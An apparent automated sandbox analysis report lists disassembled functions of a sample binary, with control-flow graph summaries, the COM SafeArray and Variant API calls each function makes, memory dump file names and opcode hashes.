                                                                                                                                                                                                                                              • API String ID: 3214764494-0
                                                                                                                                                                                                                                              • Opcode ID: 26bafdffb983fcc449ca657fa85217c2782bde6a853dea23a8390bddbf54eb23
                                                                                                                                                                                                                                              • Instruction ID: cacd19a21dd08841a800e82699463018e767d2b741fdfc23b057a1ceb7acacb5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26bafdffb983fcc449ca657fa85217c2782bde6a853dea23a8390bddbf54eb23
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD7125726483419FD300DF69C880A5ABBF8BF89754F108A5DFA59CB791D730E905CB62
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFCD20 Relevance: 15.5, APIs: 10, Instructions: 485COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1499 6cefcd20-6cefcd97 VariantInit * 3 SafeArrayCreateVector 1500 6cefcd99-6cefcd9c 1499->1500 1501 6cefcda1-6cefcdc0 SafeArrayPutElement VariantClear 1499->1501 1500->1501 1502 6cefcdc6-6cefcdd1 1501->1502 1503 6cefd2a0-6cefd2a2 1501->1503 1506 6cefcddd-6cefcdef 1502->1506 1507 6cefcdd3-6cefcdd8 call 6cf4c1e0 1502->1507 1504 6cefd2ab-6cefd2d7 VariantClear * 3 1503->1504 1505 6cefd2a4-6cefd2a5 SafeArrayDestroy 1503->1505 1505->1504 1506->1503 1510 6cefcdf5-6cefce01 1506->1510 1507->1506 1510->1503 1511 6cefce07-6cefcea4 1510->1511 1519 6cefceba-6cefcf2b 1511->1519 1520 6cefcea6-6cefceb7 1511->1520 1526 6cefcf2d-6cefcf3e 1519->1526 1527 6cefcf41-6cefd222 1519->1527 1520->1519 1526->1527 1562 6cefd22e-6cefd25c 1527->1562 1563 6cefd224-6cefd229 call 6cf4c1e0 1527->1563 1566 6cefd25e-6cefd269 1562->1566 1567 6cefd29d 1562->1567 1563->1562 1566->1567 1568 6cefd26b-6cefd27b call 6ceedb30 1566->1568 1567->1503 1568->1567 1571 6cefd27d-6cefd28d call 6cef56b0 call 6cef6880 1568->1571 1575 6cefd292-6cefd299 1571->1575 1575->1567
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFCD5C
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFCD65
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFCD6B
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEFCD76
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEFCDAA
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFCDB7
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEFD2A5
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFD2B5
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFD2BB
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFD2C1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2515392200-0
                                                                                                                                                                                                                                              • Opcode ID: 3ec87a9a22dc353f670ace9ae49f3cabb25853dd722b46803c2b18284d4be98e
                                                                                                                                                                                                                                              • Instruction ID: c442a5e7078502f88f2d352eba88f5bedd399f809f91110ac3cf5aab0f899f01
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ec87a9a22dc353f670ace9ae49f3cabb25853dd722b46803c2b18284d4be98e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40120675A11705AFD758DBA8DD84DAAB7B9BF8C300F14466CF50A9BB91CA30F841CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF66A0 Relevance: 15.2, APIs: 10, Instructions: 155COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1576 6cef66a0-6cef6725 VariantInit * 2 SafeArrayCreateVector 1577 6cef672f-6cef674f SafeArrayPutElement VariantClear 1576->1577 1578 6cef6727-6cef672a 1576->1578 1579 6cef6755-6cef6772 1577->1579 1580 6cef6844-6cef6846 1577->1580 1578->1577 1581 6cef677c-6cef679c SafeArrayPutElement VariantClear 1579->1581 1582 6cef6774-6cef6779 1579->1582 1583 6cef684f-6cef6878 VariantClear * 2 1580->1583 1584 6cef6848-6cef6849 SafeArrayDestroy 1580->1584 1581->1580 1585 6cef67a2-6cef67b0 1581->1585 1582->1581 1584->1583 1586 6cef67bc-6cef67ef 1585->1586 1587 6cef67b2-6cef67b7 call 6cf4c1e0 1585->1587 1599 6cef67f2 call 127d171 1586->1599 1600 6cef67f2 call 127d170 1586->1600 1587->1586 1589 6cef67f4-6cef67f6 1589->1580 1590 6cef67f8-6cef6805 1589->1590 1590->1580 1591 6cef6807-6cef681c call 6ceedb30 1590->1591 1591->1580 1594 6cef681e-6cef683f call 6cef56b0 call 6cef6880 1591->1594 1594->1580 1599->1589 1600->1589
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32 ref: 6CEF66DB
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32 ref: 6CEF66EA
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEF6700
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEF673A
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF6747
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEF6787
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF6794
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEF6849
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF685A
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF6861
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 551789342-0
                                                                                                                                                                                                                                              • Opcode ID: 8031c00dc01f62dd257e89213ff4f1bd699008bc8a69042bd6c76c503f028296
                                                                                                                                                                                                                                              • Instruction ID: 58f6034a45d70a2ea158d243bfca942aa4a1ca9e5da895f04f6be14350c12ad4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8031c00dc01f62dd257e89213ff4f1bd699008bc8a69042bd6c76c503f028296
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96517676608245AFC701CF64C840B9BBBF8EF99714F218A1DF9549B750DB34E905CBA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF840E Relevance: 13.8, APIs: 9, Instructions: 332COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1601 6cef840e-6cef8413 call 6cf4c1e0 1603 6cef8418-6cef841f 1601->1603 1691 6cef8422 call 127d171 1603->1691 1692 6cef8422 call 127d170 1603->1692 1604 6cef8424-6cef8426 1605 6cef842c-6cef8443 call 6ceedfb0 1604->1605 1606 6cefae53-6cefae60 1604->1606 1605->1606 1615 6cef8449-6cef8454 1605->1615 1607 6cefae68-6cefae70 1606->1607 1608 6cefae62-6cefae65 SafeArrayDestroy 1606->1608 1610 6cefae7b-6cefae83 1607->1610 1611 6cefae72-6cefae75 SafeArrayDestroy 1607->1611 1608->1607 1613 6cefae8e-6cefae96 1610->1613 1614 6cefae85-6cefae88 SafeArrayDestroy 1610->1614 1611->1610 1616 6cefae98-6cefae9b SafeArrayDestroy 1613->1616 1617 6cefaea1-6cefaea9 1613->1617 1614->1613 1618 6cef8456-6cef8461 1615->1618 1619 6cef8464-6cef846f 1615->1619 1616->1617 1620 6cefaeab-6cefaeae SafeArrayDestroy 1617->1620 1621 6cefaeb4-6cefaebc 1617->1621 1618->1619 1622 6cef847f-6cef8487 1619->1622 1623 6cef8471-6cef847c 1619->1623 1620->1621 1626 6cefaebe-6cefaec1 SafeArrayDestroy 1621->1626 1627 6cefaec7-6cefaed3 1621->1627 1624 6cef8489-6cef848e call 6cf4c1e0 1622->1624 1625 6cef8493-6cef84a9 1622->1625 1623->1622 1624->1625 1625->1606 1634 6cef84af-6cef84e7 SafeArrayGetLBound SafeArrayGetUBound 1625->1634 1626->1627 1629 6cefaedd-6cefaef8 call 6cf3948b 1627->1629 1630 6cefaed5-6cefaeda 1627->1630 1630->1629 1635 6cef84ed-6cef8512 SafeArrayGetElement 1634->1635 1636 6cef8616-6cef862d call 6ceedfb0 1634->1636 1638 6cef8758-6cef8761 1635->1638 1639 6cef8518-6cef8523 1635->1639 1636->1606 1644 6cef8633-6cef864d call 6ceedfb0 1636->1644 1638->1606 1640 6cef8767-6cef876f 1638->1640 1642 6cef852d-6cef853b 1639->1642 1643 6cef8525-6cef8528 1639->1643 1640->1606 1645 6cef853d-6cef8542 1642->1645 1646 6cef8545-6cef855a 1642->1646 1643->1642 1644->1606 1654 6cef8653-6cef866d call 6ceedfb0 1644->1654 1645->1646 1649 6cef855c-6cef8561 1646->1649 1650 6cef8564-6cef8582 call 6cef3a90 1646->1650 1649->1650 1655 6cef858f-6cef85ab call 6cef3a90 1650->1655 1656 6cef8584-6cef858d 1650->1656 1654->1606 1663 6cef8673-6cef868c call 6ceedfb0 1654->1663 1664 6cef85be-6cef85f6 call 6cf3a1f7 * 2 1655->1664 1665 6cef85ad-6cef85b0 1655->1665 1658 6cef85b6-6cef85b9 call 6ceead80 1656->1658 1658->1664 1663->1606 1670 6cef8692-6cef86ac call 6ceedfb0 1663->1670 1676 6cef85f8-6cef85fd 1664->1676 1677 6cef8600-6cef8610 1664->1677 1665->1658 1670->1606 1675 6cef86b2-6cef86d1 call 6cef69c0 1670->1675 1675->1606 1680 6cef86d7-6cef86f7 call 6cef69c0 1675->1680 1676->1677 1677->1635 1677->1636 1680->1606 1683 6cef86fd-6cef870b 1680->1683 1684 6cef870d-6cef8712 1683->1684 1685 6cef8715-6cef8753 call 6cef69c0 call 6cf3a1f7 1683->1685 1684->1685 1685->1606 1691->1604 1692->1604
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEF84BF
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF84D2
                                                                                                                                                                                                                                              • SafeArrayGetElement.OLEAUT32 ref: 6CEF850A
                                                                                                                                                                                                                                                • Part of subcall function 6CEF3A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEF3B71
                                                                                                                                                                                                                                                • Part of subcall function 6CEF3A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF3B83
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEF6A08
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF6A15
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEF6A41
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                                • Part of subcall function 6CEEDFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEEDFF6
                                                                                                                                                                                                                                                • Part of subcall function 6CEEDFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEEE003
                                                                                                                                                                                                                                                • Part of subcall function 6CEEDFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEEE02F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Bound$Destroy$Element
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 959723449-0
                                                                                                                                                                                                                                              • Opcode ID: 99e86f8523e905b1971bfea4f0b3f6adf2d993e055a8f50353e7232219aa016f
                                                                                                                                                                                                                                              • Instruction ID: b0310a2397bb7169cc55149a8be16a38f82dbf53069f609e73a9f4fe2b2a0435
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99e86f8523e905b1971bfea4f0b3f6adf2d993e055a8f50353e7232219aa016f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DC17270A012049FDB10DF69CC80FADB7B9AF85308F308599E529EB786D771E985CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF4170 Relevance: 13.8, APIs: 9, Instructions: 277COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF41AF
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF41B5
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEF41C0
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEF41F5
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF4201
                                                                                                                                                                                                                                              • std::tr1::_Xweak.LIBCPMT ref: 6CEF4450
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF446D
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF447D
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF4483
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1774866819-0
                                                                                                                                                                                                                                              • Opcode ID: 719000a88400c1ce4cf7106eb14843393adde93549ede2daa283b42ba5bef692
                                                                                                                                                                                                                                              • Instruction ID: 8fd95cf75afab286d2723134b29647de47737b9c85fe10beb69777eba494815c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 719000a88400c1ce4cf7106eb14843393adde93549ede2daa283b42ba5bef692
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09B148756006499FCB14DF98C884EEAB7F5BF8D300F15856DE50AABB91DA34F841CB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFC530 Relevance: 13.8, APIs: 9, Instructions: 259COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFC56F
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFC575
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEFC580
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEFC5B5
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFC5C1
                                                                                                                                                                                                                                              • std::tr1::_Xweak.LIBCPMT ref: 6CEFC7D4
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFC7F1
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFC801
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFC807
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1774866819-0
                                                                                                                                                                                                                                              • Opcode ID: ce7bdc4c47f326570d543e58b062f5f4f94cbf78f5e4523ee7b1fb9824f545e8
                                                                                                                                                                                                                                              • Instruction ID: fe74afebf5f2f813d161010fccb5d9a89c700291af6338299449c6b33b274204
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce7bdc4c47f326570d543e58b062f5f4f94cbf78f5e4523ee7b1fb9824f545e8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64A13B756006099FCB24DFA4C884EEAB7F5BF8D310F25856CE506ABB91DB34B841CB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF6880 Relevance: 13.6, APIs: 9, Instructions: 117COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF68B2
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF68BD
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEF68D7
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEF68FD
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF6909
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEF6923
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEF6981
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF699E
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF69A4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3529038988-0
                                                                                                                                                                                                                                              • Opcode ID: 23932bebb5cf23f0e58ab91087e66c715a02bf94816991bcf163e2c4f46dbf5b
                                                                                                                                                                                                                                              • Instruction ID: a85ff4e0a0657dac5e613851fcac007eb2fab91e1c70f2f2016423f61e6d6bc4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23932bebb5cf23f0e58ab91087e66c715a02bf94816991bcf163e2c4f46dbf5b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C4180B2E00219AFDB01DFA4C844EEEBBB8FF99314F158119E515E7300E775A905CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEDB30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                                                              Download Yara Rule
